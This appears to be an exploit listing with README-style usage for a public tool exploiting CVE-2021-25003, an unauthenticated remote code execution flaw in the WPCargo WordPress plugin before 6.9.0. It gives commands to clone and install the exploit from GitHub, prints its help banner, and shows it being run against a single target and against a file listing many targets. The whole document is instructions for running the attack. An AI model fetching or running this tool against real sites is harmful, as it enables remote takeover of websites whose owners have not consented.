Title: WPCargo < 6.9.0 - Unauthenticated RCE
Author: Krzysztof Zając [ https://kazet.cc/ ]
CVE: CVE-2021-25003
git clone https://github.com/biulove0x/CVE-2021-25003.git
cd CVE-2021-25003/
python3 -m pip install -r requirements.txt
$ python3 WpCargo.py --help
############################################
# @author : biulove0x #
# @name : WP Plugins WPCargo Exploiter #
# @cve : CVE-2021-25003 #
############################################
usage: exploit.py [-h] [-t example.com] [-l target.txt]

CVE-2021-25003 [ WPCargo < 6.9.0 - Unauthenticated RCE ]

optional arguments:
  -h, --help      show this help message and exit
  -t example.com  Single target
  -l target.txt   Multiple target
$ python3 WPCargo.py -t http://example.com/
$ cat target.txt
http://example.com/
https://examples.com/
$ python3 WPCargo.py -l target.txt